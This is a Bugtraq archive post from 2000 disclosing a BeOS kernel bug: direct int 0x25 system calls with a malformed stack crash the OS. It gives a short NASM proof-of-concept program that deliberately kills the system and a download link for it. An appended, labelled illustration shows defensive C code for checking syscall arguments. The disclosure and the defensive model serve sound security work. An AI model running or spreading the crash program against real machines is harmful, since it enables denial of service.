Bugtraq mailing list archives
BeOS syscall bug
From: konst () LINUXASSEMBLY ORG (Konstantin Boldyshev)
Date: Mon, 10 Apr 2000 13:16:28 -0000
Summary:

BeOS crashes when a system call with invalid parameters is issued.

Details:

When using direct kernel calls through int 0x25 (not libroot.so functions), BeOS dies on most system calls with invalid parameters/stack. Although Be has registered this bug before R5.0, it is present in R5.0, and is present at least in all R4.5.x (http://bebugs.be.com/devbugs/detail.php3?oid=2324160).

No fix is available, it's a kernel bug.

Here's a sample assembly program that kills BeOS (nasm):

    section .text
    global _start

    _start:
            push    dword msg
            push    dword len
            push    dword 1         ;stdout
            mov     eax,3           ;sys_write
            int     0x25            ;must be a *call* to int 0x25,
                                    ;then everything goes ok; i.e.
                                    ;return address must be on the stack,
                                    ;but it is not
            mov     eax,0x3f        ;sys_exit
            int     0x25

    msg     db      "hello",0xa
    len     equ     $ - msg

(source and binary can be downloaded at http://linuxassembly.org/BeDie.tgz)

References:

http://www.escribe.com/software/bedevtalk/ - BeDevTalk archives (Feb-Mar 2000, search for topics "assembly & BeOS", "system calls", "system call stress testing")
http://linuxassembly.org - Linux/UNIX assembly programming portal
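Added illustration, not part of the original post and not BeOS code: a small C model of the validation a syscall entry path needs so that an invalid user stack or invalid parameters produce an error instead of a kernel fault. The memory layout, the argument frame layout, the error code and all function names are assumptions made for the example.

```c
#include <stdint.h>
#include <string.h>

/* Constructed model of a user mapping; addresses and sizes are hypothetical. */
#define USER_BASE 0x1000u
#define USER_SIZE 0x100u
#define ERR_BAD_ADDRESS (-1)   /* hypothetical error code */
static uint8_t user_mem[USER_SIZE];

/* True only if [addr, addr+len) lies wholly inside the user mapping. */
static int user_range_ok(uint32_t addr, uint32_t len)
{
    if (addr < USER_BASE) return 0;
    uint32_t off = addr - USER_BASE;
    return off <= USER_SIZE && len <= USER_SIZE - off; /* overflow-safe */
}

/* Checked copy-in: the handler's only path to user memory. */
static int copy_in(void *dst, uint32_t src, uint32_t len)
{
    if (!user_range_ok(src, len)) return ERR_BAD_ADDRESS;
    memcpy(dst, user_mem + (src - USER_BASE), len);
    return 0;
}

/* Write-like call with arguments on the user stack above a return slot:
 * [esp]=ret, [esp+4]=fd, [esp+8]=buf, [esp+12]=len (assumed layout). */
int sys_write_checked(uint32_t user_esp, uint8_t *out, uint32_t out_cap)
{
    uint32_t args[3];
    /* 1. Validate the stack frame before reading arguments from it. */
    if (copy_in(args, user_esp + 4, sizeof args) != 0) return ERR_BAD_ADDRESS;
    /* 2. Treat the fetched buffer pointer and length as untrusted too. */
    if (args[2] > out_cap || copy_in(out, args[1], args[2]) != 0)
        return ERR_BAD_ADDRESS;
    return (int)args[2];
}

int main(void)
{
    uint8_t out[16];
    /* Constructed frame without a return slot, at the very top of the mapping:
     * the argument fetch at esp+4 would run off the end and is refused. */
    uint32_t frame[3] = { 1, 6, USER_BASE + 0x40 };
    memcpy(user_mem + USER_SIZE - sizeof frame, frame, sizeof frame);
    uint32_t esp = USER_BASE + USER_SIZE - (uint32_t)sizeof frame;
    return sys_write_checked(esp, out, sizeof out) == ERR_BAD_ADDRESS ? 0 : 1;
}
```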